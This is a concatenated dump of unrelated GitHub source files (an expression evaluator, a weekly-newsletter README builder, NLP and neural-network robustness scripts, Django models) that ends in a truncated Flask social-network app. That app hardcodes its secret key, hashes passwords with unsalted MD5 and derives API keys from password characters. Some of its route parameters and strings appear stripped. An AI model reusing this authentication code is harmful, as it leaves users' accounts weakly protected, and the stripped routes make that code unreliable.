0\nwhile collection: # while item < len(collections[item)\n current_item = collection.popleft() # element = collection[item] # gerisi karisik gerekli mi emin degilim 19.30'da cozum\n\n if current_item not in \"*+-/\":\n num_lst.append(int(current_item))\n else:\n operator = current_item\n item_1 = num_lst.popleft()\n\n while num_lst:\n item_2 = num_lst.popleft()\n item_1 = operations[operator](item_1, item_2)\n\n num_lst.appendleft(item_1)\n\nprint(num_lst.pop())\n","repo_name":"Polishko/SoftUni","sub_path":"Python Advanced Exercises/Stacks, Queues, Tuples and Sets/express_alt_1.py","file_name":"express_alt_1.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1327422234","text":"import os\nimport httpx\nimport re\nimport urllib.parse\nimport datetime\n\ndef fetch_ci_time(filePath):\n entries = httpx.get(\"https://api.github.com/repos/tw93/weekly/commits?path=\" + filePath + \"&page=1&per_page=1\")\n ciTime= entries.json()[0][\"commit\"][\"committer\"][\"date\"].split(\"T\")[0]\n return ciTime\n # return datetime.datetime.strptime(ciTime,\"%Y-%m-%d\")\n\nif __name__ == \"__main__\":\n readmefile=open('README.md','w')\n readmefile.write(\"# 潮流周刊\\n\\n> 记录工程师 Tw93 的不枯燥生活,欢迎订阅,也欢迎 [推荐](https://github.com/tw93/weekly/discussions/22) 你的好东西,Fork 自用可见 [开发文档](https://github.com/tw93/weekly/blob/main/Deploy.md),期待你玩得开心~\\n\\n\")\n recentfile=open('RECENT.md','w')\n\n for root, dirs, filenames in os.walk('./src/pages/posts'):\n filenames = sorted(filenames, key=lambda x:float(re.findall(\"(\\d+)\",x)[0]), reverse=True)\n\n for index, name in enumerate(filenames):\n if name.endswith('.md'):\n filepath = urllib.parse.quote(name)\n oldTitle = name.split('.md')[0]\n url = 'https://weekly.tw93.fun/posts/' + oldTitle\n title = '第 ' + oldTitle.split('-')[0] + ' 期 - ' + oldTitle.split('-')[1]\n readmeMd= '* [{}]({})\\n'.format(title, url)\n dateList = [\"2022-10-10\",\"2022-09-26\",\"2022-09-12\",\"2022-09-05\",\"2022-08-29\"]\n num = int(oldTitle.split('-')[0])\n if index < 5 :\n if num < 100 :\n modified = dateList[99-num]\n else :\n modified = fetch_ci_time('/src/pages/posts/' + filepath)\n\n recentMd= '* [{}]({}) - {}\\n'.format(title, url, modified)\n recentfile.write(recentMd)\n readmefile.write(readmeMd)\n\n recentfile.close()\n readmefile.close()\n","repo_name":"tw93/weekly","sub_path":"build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":1761,"program_lang":"python","lang":"en","doc_type":"code","stars":441,"dataset":"github-code","pt":"53"} +{"seq_id":"70054562407","text":"\"\"\"\nCalculates the homogeneity of stories as the pairwise cosine similarity of the\nvectors corresponding to the top 5 characters, saving the results to a .tsv\nfile.\n\n@author: Hardik\n\"\"\"\n\nimport argparse\nimport csv\nimport itertools as it\nimport logging\nimport numpy as np\nimport os\nimport sys\nsys.path.insert(1, os.path.join(sys.path[0], os.path.join('..', 'src')))\n\nfrom nltk.corpus import stopwords\nfrom scipy.spatial.distance import cosine\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.preprocessing import normalize\n\nfrom aliases import AliasesManager\nfrom collocates import CollocatesManager\nfrom corpus import CorpusManager\nfrom ranks import RANK_GROUPS\n\n\n# Configure logging\nlogging.basicConfig(format=\"%(levelname)s: [%(asctime)s] %(message)s\",\n\tlevel=logging.INFO)\n\n\nSTOPWORDS = stopwords.words('english')\n\n\ndef main():\n\tparser_description = (\"Calculates the homogeneity of stories as the \"\n\t\t\"pairwise cosine similarity of the vectors corresponding to the top 5 \"\n\t\t\"characters, saving the results to a .tsv file.\")\n\tparser = argparse.ArgumentParser(description=parser_description)\n\n\tparser.add_argument('out_path', help=\"Path to output .tsv file\")\n\t\n\targs = parser.parse_args()\n\n\taliases_manager = AliasesManager()\n\tcollocates_manager = CollocatesManager()\n\tcorpus_manager = CorpusManager()\n\t\n\t# Story Id's\n\tsids = corpus_manager.get_ids(origin='gen')\n\t\n\twith open(args.out_path, 'wb') as f:\n\t\twriter = csv.writer(f, delimiter='\\t', quotechar='\"')\n\n\t\t# Write header.\n\t\twriter.writerow(['STORY ID', 'HOMOGENEITY'])\n\n\t\tfor sid in sids:\n\t\t\tif not aliases_manager.saved(sid, tpe='character') or \\\n\t\t\t\tnot collocates_manager.saved(sid, tpe='character'):\n\t\t\t\tlogging.info(\"Skipping %s...\" % sid)\n\t\t\t\tcontinue\n\n\t\t\tlogging.info(\"For %s\" % sid)\n\n\t\t\ttry:\n\t\t\t\tcollocates = collocates_manager.get(sid, tpe='character',\n\t\t\t\t\tranks=range(1, 6))\n\n\t\t\t\tkeyfunc = lambda c: c['alias']['entity']['rank']\n\t\t\t\tcollocates = sorted(collocates, key=keyfunc)\n\t\t\t\t\n\t\t\t\tgrouped_collocates = {r: list(cs) for r, cs\n\t\t\t\t\tin it.groupby(collocates, key=keyfunc)}\n\n\t\t\t\tcount_vect = CountVectorizer(stop_words=STOPWORDS)\n\t\t\t\tcount_vect.fit([' '.join([c['token']['lemma'] for c in cs])\n\t\t\t\t\tfor _, cs in grouped_collocates.iteritems()])\n\n\t\t\t\tvecs = []\n\t\t\t\tfor rank, colls in grouped_collocates.iteritems():\n\t\t\t\t\tvec = count_vect.transform([' '.join([coll['token']['lemma']\n\t\t\t\t\t\tfor coll in colls])]).astype(float)\n\t\t\t\t\tvecs.append(normalize(vec).todense())\n\n\t\t\t\tpairwise_sims = [1 - cosine(vec1, vec2) for vec1, vec2\n\t\t\t\t\tin it.combinations(vecs, 2)]\n\t\t\t\t\t\n\t\t\t\twriter.writerow([sid, np.mean(pairwise_sims)])\n\t\t\texcept (IndexError, ValueError):\n\t\t\t\tlogging.info(\"Skipping %s\" % sid)\n\n\nif __name__ == '__main__':\n\tmain()\n","repo_name":"rbudac/McGill-Characterization-Process","sub_path":"scripts/calc_homogeneity.py","file_name":"calc_homogeneity.py","file_ext":"py","file_size_in_byte":2723,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"20511853835","text":"import itertools\nimport json\nimport os\nimport matlab.engine\nimport imageio # MUST APPEAR *AFTER* \"import matlab.engine\" or nasty error messages will occur\nimport nbformat\nimport numpy\nfrom pathlib import Path\nimport re\nimport subprocess\nimport RobustnessKeys\nfrom SourceReplacePreprocessor import SourceReplacePreprocessor\nfrom TagRunPreprocessor import TagRunPreprocessor\nimport TemplateManager\n\n\nclass ComputeRobustness:\n\n training_data_directory_name = \"TrainingData\"\n\n stats_file_name = \"stats.json\"\n\n sum_key = \"sum\"\n sum_squared_key = \"sum_squared\"\n total_pixels_key = \"total_pixels\"\n\n results_json_file_name = \"results.json\"\n\n alc_home_env_var_name = \"ALC_HOME\"\n\n def __init__(self, template_parameters_file):\n self.template_parameters_file_path = Path(template_parameters_file)\n\n @staticmethod\n def check_value(num_channels, value):\n retval = value\n\n if num_channels == 3:\n if isinstance(value, list):\n if len(value) == 1:\n retval = value * 3\n elif len(value) != 3:\n retval = None\n else:\n retval = [value] * 3\n\n return retval\n\n @staticmethod\n def check_mean_std(eng, image, mean, std):\n num_channels = eng.size(image, 3)\n\n return_mean = ComputeRobustness.check_value(num_channels, mean)\n if return_mean is None:\n raise RuntimeError(\"Please specify a valid mean\")\n return_mean = mean\n\n return_std = ComputeRobustness.check_value(num_channels, std)\n if return_std is None:\n raise RuntimeError(\"Please specify a valid mean\")\n\n return return_mean, return_std\n\n def compute_and_create_notebook(self):\n\n with self.template_parameters_file_path.open(\"r\") as template_parameters_fp:\n template_parameter_map = json.load(template_parameters_fp)\n\n #\n # GET DATASET SCRIPT FOR EXTRACTING TRAINING/TESTING DATA IMAGES, CATEGORY NAMES, CATEGORY VALUES\n #\n lec_dataset_script_text = template_parameter_map[RobustnessKeys.template_dataset_key]\n\n match = re.search(r\"class\\s*(\\w+)\", lec_dataset_script_text)\n class_name = match.group(1)\n exec(lec_dataset_script_text, globals())\n clazz = globals().get(class_name)\n\n #\n # GET CATEGORY DICT FROM TRAINING DATA\n #\n\n lec_directory = template_parameter_map[RobustnessKeys.template_lec_parent_directory_path_key]\n training_data_directory_path = Path(lec_directory, ComputeRobustness.training_data_directory_name)\n category_dict = clazz(training_data_directory_path).get_category_dict()\n\n #\n # GET STATS FOR CALCULATING MEAN, STD\n #\n stats_file_path = Path(training_data_directory_path, ComputeRobustness.stats_file_name)\n if stats_file_path.is_file():\n with stats_file_path.open(\"r\") as stats_fp:\n stats_json = json.load(stats_fp)\n sum_intensity = stats_json[ComputeRobustness.sum_key]\n if isinstance(sum_intensity, list):\n sum_intensity = numpy.asarray(sum_intensity)\n sum_intensity_squared = stats_json[ComputeRobustness.sum_squared_key]\n if isinstance(sum_intensity_squared, list):\n sum_intensity_squared = numpy.asarray(sum_intensity_squared)\n total_pixels = stats_json[ComputeRobustness.total_pixels_key]\n else:\n png_chain = itertools.chain(\n # *png_iteratable_list,\n training_data_directory_path.glob(\"**/*.png\")\n )\n\n intensity_initialized = False\n sum_intensity = None\n sum_intensity_squared = None\n total_pixels = 0\n for training_file in png_chain:\n image = imageio.imread(training_file)\n shape = image.shape\n if len(shape) == 2:\n image = numpy.expand_dims(image, axis=2)\n shape = image.shape\n total_pixels += shape[0] * shape[1]\n num_channels = shape[2]\n\n if not intensity_initialized:\n intensity_initialized = True\n sum_intensity = numpy.asarray([0] * num_channels)\n sum_intensity_squared = numpy.asarray([0] * num_channels)\n\n for channel in range(0, num_channels):\n norm_channel = image[:, :, channel] / 255.0\n sum_intensity[channel] += norm_channel.sum()\n sum_intensity_squared[channel] += numpy.square(norm_channel).sum()\n\n stats_json = {\n ComputeRobustness.sum_key: sum_intensity.tolist(),\n ComputeRobustness.sum_squared_key: sum_intensity_squared.tolist(),\n ComputeRobustness.total_pixels_key: total_pixels\n }\n with stats_file_path.open(\"w\") as stats_fp:\n json.dump(stats_json, stats_fp, indent=4, sort_keys=True)\n\n #\n # CALCULATE MEAN, STD\n #\n mean = sum_intensity / total_pixels\n variance = sum_intensity_squared / total_pixels - numpy.square(mean)\n std = numpy.sqrt(variance)\n\n mean_list = mean.tolist()\n std_list = std.tolist()\n\n template_parameter_map[RobustnessKeys.template_mean_key] = mean_list\n template_parameter_map[RobustnessKeys.template_standard_deviation_key] = std_list\n\n # START MATLAB ENGINE\n eng = matlab.engine.start_matlab()\n\n # ADD PATHS OF NEEDED FUNCTIONS TO MATLAB ENVIRONMENT\n matlab_function_path_list = []\n\n local_matlab_function_dir = str(Path(Path(__file__).absolute().parent, \"matlab\"))\n matlab_function_path_list.append(local_matlab_function_dir)\n\n alc_home_path = Path(os.environ[ComputeRobustness.alc_home_env_var_name])\n\n nnv_code_dir = str(Path(alc_home_path, \"verivital\", \"nnv\", \"code\", \"nnv\"))\n matlab_function_path_list.append(nnv_code_dir)\n\n nnv_engine_util_dir = str(Path(nnv_code_dir, \"engine\", \"utils\"))\n matlab_function_path_list.append(nnv_engine_util_dir)\n\n #\n # EXECUTE MATLAB ENGINE\n #\n eng.addpath(*matlab_function_path_list)\n eng.cd(nnv_code_dir)\n eng.startup_nnv(nargout=0)\n\n # LOAD NETWORK\n mat_file_name = template_parameter_map[RobustnessKeys.template_lec_file_name_key]\n network_directory = template_parameter_map[RobustnessKeys.template_lec_directory_path_key]\n network_directory_path = Path(network_directory)\n mat_file = Path(network_directory_path, mat_file_name)\n\n net = eng.load(str(mat_file))\n net = eng.struct2cell(net)[0]\n # eng.workspace['net'] = net\n layers = eng.getfield(net, 'Layers')\n output_size = len(eng.getfield(layers[-1], 'Bias'))\n eng.setfield(net, 'OutputSize', output_size)\n\n # GET NUMBER OF CORES\n c = eng.parcluster('local')\n num_cores = eng.get(c).get('NumWorkers') # specify number of cores used for verification\n\n parameter_map = template_parameter_map[RobustnessKeys.template_parameter_map_key]\n\n reach_method = parameter_map[RobustnessKeys.method_parameter_key]\n\n #\n # GET NAMES OF ALL REQUIRED PARAMETERS\n #\n attack_type = parameter_map[RobustnessKeys.attack_parameter_key]\n extra_parameter_set = RobustnessKeys.attack_map \\\n .get(attack_type) \\\n .get(RobustnessKeys.required_parameters_key)\n\n perturbation_function_name = RobustnessKeys.attack_map\\\n .get(attack_type) \\\n .get(RobustnessKeys.perturbation_function_name_key)\n perturbation_function = getattr(eng, perturbation_function_name)\n\n structure_data_map = {name: parameter_map[name] for name in extra_parameter_set}\n per_image_function = perturbation_function(structure_data_map)\n\n #\n # CREATE TEST-DATA CSV FILE\n #\n test_data_directory_list = template_parameter_map[RobustnessKeys.template_test_data_directory_list_key]\n success_table = []\n test_data_object = clazz(test_data_directory_list, category_map=category_dict)\n for image_file, category_name, category_number in test_data_object:\n im_target = matlab.double([category_number])\n\n image = eng.imread(str(image_file))\n image = matlab.double(image)\n\n mod_mean, mod_std = ComputeRobustness.check_mean_std(eng, image, mean_list, std_list)\n mean_for_image = matlab.double(mod_mean)\n std_for_image = matlab.double(mod_std)\n\n input_set_star = eng.getImageStar(image, per_image_function, mean_for_image, std_for_image)\n\n # net.verifyRobustness(input_net_star, im_target, reach_method, num_cores)\n r_nn = eng.verifyRobustness(net, input_set_star, im_target, reach_method, num_cores)\n\n success_table.append({\n RobustnessKeys.image_path_key: str(image_file),\n RobustnessKeys.category_name_key: category_name,\n RobustnessKeys.category_number_key: category_number,\n RobustnessKeys.result_key: r_nn\n })\n\n eng.exit()\n\n template_parameter_map[RobustnessKeys.template_results_file_name_key] = \\\n ComputeRobustness.results_json_file_name\n\n template = TemplateManager.image_perturbation_python_notebook_template\n\n notebook_string = template.render(**template_parameter_map)\n\n specific_notebook_directory_path = Path(\n template_parameter_map[RobustnessKeys.template_specific_notebook_directory_key]\n )\n specific_notebook_directory_path.mkdir(parents=True, exist_ok=True)\n\n notebook_path = Path(specific_notebook_directory_path, \"robustness.ipynb\")\n\n results_json_file_path = Path(specific_notebook_directory_path, ComputeRobustness.results_json_file_name)\n with results_json_file_path.open(\"w\") as results_fp:\n json.dump(success_table, results_fp, indent=4, sort_keys=True)\n\n tag_run_preprocessor = TagRunPreprocessor(timeout=1800, kernel_name='python3')\n tag_run_preprocessor.execute_cell_tags = (\"execute_cell\",)\n\n source_replace_preprocessor = SourceReplacePreprocessor()\n source_replace_preprocessor.source_replace_tags = (\"source_replace\",)\n source_replace_preprocessor.regex_substitution_list = [\n (\"AUTORUN ALL CELLS\", \"# Cells below should be executed automatically\", True)\n ]\n\n nb = nbformat.reads(notebook_string, as_version=4)\n\n try:\n (nb, resources) = tag_run_preprocessor.preprocess(\n nb, {'metadata': {'path': str(notebook_path.parent.absolute())}}\n )\n source_replace_preprocessor.preprocess(nb, {})\n except:\n pass\n\n with notebook_path.open(\"w\", encoding='utf-8') as notebook_fp:\n nbformat.write(nb, notebook_fp)\n\n subprocess.run([\"jupyter\", \"trust\", str(notebook_path)])\n notebook_path.chmod(0o444)\n\n #\n # WRITE PATH TO NOTEBOOK HERE\n #\n\n\nif __name__ == '__main__':\n import argparse\n\n parser = argparse.ArgumentParser(description=\"Specify json file from which to read program parameters\")\n parser.add_argument(\"json_file\")\n args = parser.parse_args()\n json_file = args.json_file\n compute_robustness = ComputeRobustness(json_file)\n compute_robustness.compute_and_create_notebook()\n","repo_name":"AbLECPS/alc","sub_path":"webgme/ALC-Dev/src/plugins/LaunchVerification/LaunchVerification/ComputeRobustness.py","file_name":"ComputeRobustness.py","file_ext":"py","file_size_in_byte":11545,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"43355013838","text":"from django.db import models\nfrom django.utils.translation import gettext as _\n\nclass Product(models.Model):\n title = models.CharField(_(\"title\"), max_length=200)\n price = models.IntegerField(_(\"price\"),)\n discount = models.FloatField(_(\"discount\"))\n special_discount = models.FloatField(_(\"special_discount\"))\n special_discount_time = models.DateTimeField(_(\"special_discount_time\"), auto_now=True, auto_now_add=False)\n number = models.IntegerField(_(\"number\"))\n description = models.TextField(_(\"description\"))\n image = models.FileField(_(\"image\"), blank=True)\n\n\nclass ProductImage(models.Model):\n product = models.ForeignKey(Product, default=None, on_delete=models.CASCADE)\n images = models.FileField(upload_to = 'images/')\n \nclass SlidBar(models.Model):\n title = models.CharField(_(\"title\"), max_length=300)\n header = models.CharField(_(\"header\"), max_length=300, blank=True)\n description = models.TextField(_(\"description\"), blank=True)\n image = models.ImageField(_(\"image\"), upload_to=\"slidbar/\")\n product_id = models.IntegerField(_(\"product id\"), blank=True, default=0)\n is_active = models.BooleanField(_(\"show on website\"))\n \n\n class Meta:\n verbose_name = _(\"slider\")\n verbose_name_plural = _(\"sliders\")\n\n def __str__(self):\n return self.title\n\n \n","repo_name":"pouyasalimian/online-store","sub_path":"my-site/product/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29269904772","text":"from datetime import datetime\r\nfrom flask import Flask, request, session, redirect, render_template, url_for, \\\r\n send_file\r\nfrom flask_sqlalchemy import SQLAlchemy\r\nfrom flask_wtf import FlaskForm\r\nfrom flask_wtf.file import FileField\r\nfrom functools import wraps\r\nfrom wtforms import StringField, PasswordField, SubmitField, \\\r\n TextAreaField\r\nfrom wtforms.fields.html5 import DateField\r\nimport hashlib\r\nfrom dateutil import parser\r\nfrom wtforms.validators import DataRequired, Length\r\nfrom libgravatar import Gravatar\r\nfrom io import BytesIO\r\n\r\napp = Flask(__name__)\r\napp.config['SQLALCHEMY_DATABASE_URI'] = url = 'sqlite:///data.db'\r\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\r\napp.config['SECRET_KEY'] = \"sup3rs3cre1p@ssvv0rd\"\r\ndb = SQLAlchemy(app)\r\n\r\nsort_types = [\"name\", \"id\", \"order_in_db\"]\r\n\r\n\r\nclass LoginForm(FlaskForm):\r\n username = StringField('Логин', validators=[\r\n DataRequired(\"Введите имя пользователя\")])\r\n password = PasswordField('Пароль',\r\n validators=[DataRequired(\"Введите пароль\")])\r\n submit = SubmitField('Войти')\r\n\r\n\r\nclass SettingsForm(FlaskForm):\r\n email = StringField('Почта')\r\n password = PasswordField('Пароль')\r\n name = StringField(\"Имя\", validators=[Length(max=10)])\r\n surname = StringField(\"Фамилия\", validators=[Length(max=25)])\r\n about_me = TextAreaField(\"О себе\", validators=[Length(max=240)])\r\n date = DateField(\"Дата рождения\")\r\n submit = SubmitField(\"Применить\")\r\n\r\n\r\nclass RegisterForm(FlaskForm):\r\n name = StringField(\"Имя\", validators=[DataRequired(\"Введите имя\"),\r\n Length(max=10)])\r\n surname = StringField(\"Фамилия\",\r\n validators=[DataRequired(\"Введите фамилию\"),\r\n Length(max=25)])\r\n about_me = TextAreaField(\"О себе\", validators=[\r\n DataRequired(\"Расскажите о себе (240 символов)\"),\r\n Length(max=240)])\r\n username = StringField(\"Логин\", validators=[\r\n DataRequired(\"Введите имя пользователя\"),\r\n Length(max=80)])\r\n date = DateField(\"Дата рождения\")\r\n password = PasswordField('Пароль',\r\n validators=[DataRequired(\"Введите пароль\"),\r\n Length(6)])\r\n retype_password = PasswordField('Повторите Пароль',\r\n validators=[\r\n DataRequired(\"Введите пароль ещё раз\")])\r\n email = StringField(\"Почта\", validators=[DataRequired(\"Введите Email\"),\r\n Length(max=120)])\r\n submit = SubmitField(\"Регистрация\")\r\n\r\n\r\nclass ArticleForm(FlaskForm):\r\n title = StringField(\"Название\",\r\n validators=[DataRequired(\"Введите название!\"),\r\n Length(max=64)])\r\n content = TextAreaField(\"Текст статьи\",\r\n validators=[DataRequired(\"Введите текст!\"),\r\n Length(max=4096)])\r\n file = FileField(\"Дополнительные файлы\")\r\n submit = SubmitField(\"Отправить\")\r\n\r\n\r\nclass User(db.Model):\r\n id = db.Column(db.Integer, primary_key=True, autoincrement=True)\r\n username = db.Column(db.String(80), unique=True, nullable=False)\r\n name = db.Column(db.String(10), unique=False, nullable=False)\r\n surname = db.Column(db.String(25), unique=False, nullable=False)\r\n email = db.Column(db.String(120), unique=True, nullable=False)\r\n about_me = db.Column(db.String(240), nullable=True)\r\n password_hash = db.Column(db.String(128), unique=False, nullable=False)\r\n avatar_path = db.Column(db.String(400), nullable=True, unique=False)\r\n api_key = db.Column(db.String(35), unique=True, nullable=False)\r\n date = db.Column(db.Date(), unique=False,\r\n nullable=False)\r\n is_beta = db.Column(db.Boolean, unique=False, default=False)\r\n is_admin = db.Column(db.Boolean, unique=False, default=False)\r\n articles = db.relationship('Article',\r\n backref=db.backref('Author',\r\n lazy=True))\r\n\r\n def __repr__(self):\r\n return ''.format(\r\n self.id, self.username, self.name, self.surname)\r\n\r\n\r\nclass Relations(db.Model):\r\n id = db.Column(db.Integer, primary_key=True, autoincrement=True)\r\n friend_from = db.Column(db.Integer)\r\n friend_to = db.Column(db.Integer)\r\n\r\n\r\nclass Article(db.Model):\r\n id = db.Column(db.Integer, primary_key=True, autoincrement=True)\r\n user_id = db.Column(db.Integer, db.ForeignKey('user.id'))\r\n title = db.Column(db.String(64), unique=False, nullable=True)\r\n content = db.Column(db.String(4096), unique=False, nullable=False)\r\n timestamp = db.Column(db.DateTime, index=True, default=datetime.utcnow)\r\n is_with_files = db.Column(db.Boolean, nullable=False)\r\n files = db.relationship(\"FileInArticle\", backref=\"Files\", lazy=True)\r\n\r\n def __repr__(self):\r\n return '
'.format(\r\n self.id, self.user_id, self.timestamp)\r\n\r\n\r\nclass FileInArticle(db.Model):\r\n id = db.Column(db.Integer, primary_key=True, autoincrement=True)\r\n name = db.Column(db.String(4096), nullable=False)\r\n article_id = db.Column(db.Integer, db.ForeignKey('article.id'))\r\n file = db.Column(db.LargeBinary, nullable=False)\r\n\r\n\r\nclass Message(db.Model):\r\n id = db.Column(db.Integer, primary_key=True, autoincrement=True)\r\n text = db.Column(db.String(4096), nullable=False)\r\n from_user_id = db.Column(db.Integer, nullable=False)\r\n to_user_id = db.Column(db.Integer, nullable=False)\r\n\r\n def __repr__(self):\r\n return ''.format(\r\n self.id, self.from_user_id, self.to_user_id)\r\n\r\n\r\ndef login_required(f):\r\n @wraps(f)\r\n def decorated_function(*args, **kwargs):\r\n if session.get(\"username\") is None:\r\n return redirect(url_for('login', next=request.url))\r\n return f(*args, **kwargs)\r\n\r\n return decorated_function\r\n\r\n\r\ndef do_magic(ident, t):\r\n if request.form['api_key'] != session.get('api_key'):\r\n pass\r\n else:\r\n sender = User.query.filter_by(\r\n id=session.get('id')).first()\r\n user = User.query.filter_by(id=ident).first()\r\n rel = Relations.query.filter_by(friend_from=sender.id,\r\n friend_to=user.id)\r\n if t == \"ad\":\r\n if user.id != sender.id and not rel.first():\r\n rel = Relations(friend_from=sender.id, friend_to=user.id)\r\n db.session.add(rel)\r\n db.session.commit()\r\n elif t == \"rm\":\r\n if user.id != sender.id and rel.first():\r\n rel.delete()\r\n db.session.commit()\r\n\r\n\r\n@app.route(\"/chat/id\", methods=['GET', 'POST'])\r\n@login_required\r\ndef chat(ident):\r\n user = User.query.filter_by(id=session.get(\"id\")).first()\r\n to_user = User.query.filter_by(id=ident).first()\r\n if not to_user:\r\n return redirect(\"/404\")\r\n if request.method == \"POST\":\r\n if request.form.get(\"message_text\"):\r\n msg = Message(text=request.form.get(\"message_text\"),\r\n from_user_id=session.get(\"id\"), to_user_id=ident)\r\n db.session.add(msg)\r\n db.session.commit()\r\n messages = list(\r\n reversed(sorted(Message.query.filter_by(from_user_id=user.id,\r\n to_user_id=to_user.id)\r\n .all() +\r\n Message.query.filter_by(\r\n from_user_id=to_user.id,\r\n to_user_id=user.id).all(),\r\n key=lambda x: -x.id)[:100]))\r\n users = {user.id: user,\r\n to_user.id: to_user}\r\n return render_template(\"chat.html\", ident=ident, messages=messages,\r\n users=users)\r\n\r\n\r\n@app.route(\"/\", methods=['POST', 'GET'])\r\n@app.route(\"/feed\", methods=['POST', 'GET'])\r\n@login_required\r\ndef index():\r\n articles = list(reversed(\r\n sorted(\r\n [Article.query.filter_by(user_id=i.friend_to).all()[:-5:-1] for i in\r\n Relations.query.filter_by(\r\n friend_from=session.get(\"id\")).all()])))[:20]\r\n try:\r\n if not articles[0]:\r\n articles = []\r\n else:\r\n articles = [(art, User.query.filter_by(id=art[0].user_id).first())\r\n for\r\n art\r\n in\r\n articles if art]\r\n except Exception as e:\r\n print(e)\r\n articles = []\r\n return render_template(\"feed.html\", articles=articles)\r\n\r\n\r\n@app.route(\"/info\")\r\ndef info():\r\n return render_template(\"info.html\")\r\n\r\n\r\n@app.route(\"/login\", methods=['POST', 'GET'])\r\ndef login():\r\n if session.get(\"username\", None) is not None:\r\n return redirect(\"/feed\")\r\n form = LoginForm()\r\n if request.method == \"POST\":\r\n if form.validate_on_submit():\r\n m = hashlib.md5()\r\n m.update(\r\n request.form['password'].encode(\r\n 'UTF-8'))\r\n user = User.query.filter_by(\r\n username=request.form['username']).first()\r\n if user and user.password_hash == m.hexdigest():\r\n session['id'] = user.id\r\n session['username'] = user.username\r\n session['api_key'] = user.api_key\r\n session['is_admin'] = user.is_admin\r\n return redirect(\"/feed\")\r\n else:\r\n form.username.errors.append(\r\n \"Пользователь с парой Логин+Пароль не найден!\")\r\n return render_template(\"login.html\", session=session, form=form)\r\n\r\n\r\n@app.route(\"/register\", methods=['POST', 'GET'])\r\ndef register():\r\n if session.get(\"username\", None) is not None:\r\n return redirect(\"/feed\")\r\n form = RegisterForm()\r\n if request.method == \"POST\":\r\n if form.validate_on_submit():\r\n if request.form['password'] != request.form['retype_password']:\r\n form.password.errors.append(\"Пароли не совпадают!\")\r\n elif \" \" in request.form[\"username\"]:\r\n form.username.errors.append(\"В логине не должно быть пробелов!\")\r\n elif \"@\" not in request.form[\"email\"]:\r\n form.email.errors.append(\"Введите реальную почту!\")\r\n elif User.query.filter_by(\r\n username=request.form['username']).first() is not None:\r\n form.username.errors.append(\"Уже зарегестрирован!\")\r\n else:\r\n try:\r\n m = hashlib.md5()\r\n m.update(\r\n (request.form['password']).encode(\r\n 'UTF-8'))\r\n m1 = hashlib.md5()\r\n m1.update((request.form['username'] + request.form[\r\n \"password\"][\r\n 2:5]).encode(\"UTF-8\"))\r\n avatar = Gravatar(request.form['email']).get_image(248)\r\n new_user = User(username=request.form['username'],\r\n name=request.form['name'],\r\n about_me=request.form['about_me'],\r\n surname=request.form['surname'],\r\n email=request.form['email'],\r\n avatar_path=avatar,\r\n password_hash=m.hexdigest(),\r\n date=parser.parse(request.form['date']),\r\n api_key=m1.hexdigest())\r\n db.session.add(new_user)\r\n db.session.commit()\r\n user = User.query.filter_by(\r\n username=new_user.username).first()\r\n session['id'] = user.id\r\n session['username'] = user.username\r\n session['api_key'] = user.api_key\r\n session['is_admin'] = user.is_admin\r\n return redirect(\"/feed\")\r\n except Exception as e:\r\n print(e)\r\n form.username.errors.append(\r\n \"Ошибка при создании профиля!\")\r\n return render_template(\"register.html\", session=session, form=form)\r\n\r\n\r\n# TODO This thing\r\n@app.route(\"/user/id/settings\", methods=['GET', 'POST'])\r\n@login_required\r\ndef settings(identificator):\r\n if identificator != session.get(\"id\") and not session.get(\"is_admin\"):\r\n return redirect(\"/404\")\r\n else:\r\n user = User.query.filter_by(id=identificator).first()\r\n form = SettingsForm()\r\n if request.method == \"POST\":\r\n if form.validate_on_submit():\r\n if \"@\" not in request.form[\"email\"]:\r\n form.email.errors.append(\"Введите реальную почту!\")\r\n elif request.form.get(\"email\") != \"\":\r\n user.email = request.form[\"email\"]\r\n user.avatar_path = Gravatar(request.form['email']) \\\r\n .get_image(248)\r\n if request.form.get(\"password\") != \"\":\r\n m = hashlib.md5()\r\n m.update(\r\n (request.form[\"password\"]).encode(\r\n 'UTF-8'))\r\n user.password_hash = m.hexdigest()\r\n if request.form.get(\"name\") != \"\":\r\n user.name = request.form[\"name\"]\r\n if request.form.get(\"surname\") != \"\":\r\n user.surname = request.form[\"surname\"]\r\n if request.form.get(\"about_me\") != \"\":\r\n user.about_me = request.form[\"about_me\"]\r\n if request.form.get(\"date\") != \"\":\r\n user.date = parser.parse(request.form['date'])\r\n db.session.commit()\r\n return redirect(f\"/user/id{identificator}\")\r\n return render_template(\"settings.html\", username=user.username,\r\n api_key=user.api_key, session=session,\r\n form=form,\r\n who=user.name + \" \" + user.surname)\r\n\r\n\r\n@app.route('/users', methods=['GET', 'POST'])\r\n@app.route(\"/user/id/subscribes\",\r\n methods=[\"GET\", \"POST\"])\r\n@login_required\r\ndef get_friends(identificator=None):\r\n query = None\r\n if request.method == \"POST\":\r\n if request.args.get(\"sort\", None) not in sort_types:\r\n session[\"sort_type\"] = sort_types[0]\r\n else:\r\n session[\"sort_type\"] = request.args[\"sort\"]\r\n if request.form.get(\"query\", None) is not None:\r\n query = request.form[\"query\"]\r\n if identificator is None:\r\n message = \"Пользователи\"\r\n who = \"\"\r\n if query is not None:\r\n friends = list(filter(lambda\r\n x: query.lower() in x.name.lower()\r\n or query.lower() in x.surname.lower()\r\n or query.lower() in\r\n x.name.lower() + \" \" +\r\n x.surname.lower(),\r\n User.query.all()))\r\n else:\r\n friends = User.query.all()\r\n else:\r\n user = User.query.filter_by(\r\n id=identificator).first()\r\n message = \"Подписки пользователя\"\r\n who = f\"{user.name} {user.surname}\".title()\r\n fr = [User.query.filter_by(id=rel.friend_to).first() for rel in\r\n Relations.query.filter_by(friend_from=user.id).all()]\r\n if query is not None:\r\n friends = list(filter(lambda\r\n x: query.lower() in x.name.lower()\r\n or query.lower()\r\n in x.surname.lower()\r\n or query.lower() in\r\n x.name.lower() + \" \" +\r\n x.surname.lower(),\r\n fr))\r\n else:\r\n friends = fr\r\n return render_template(\"friends.html\", 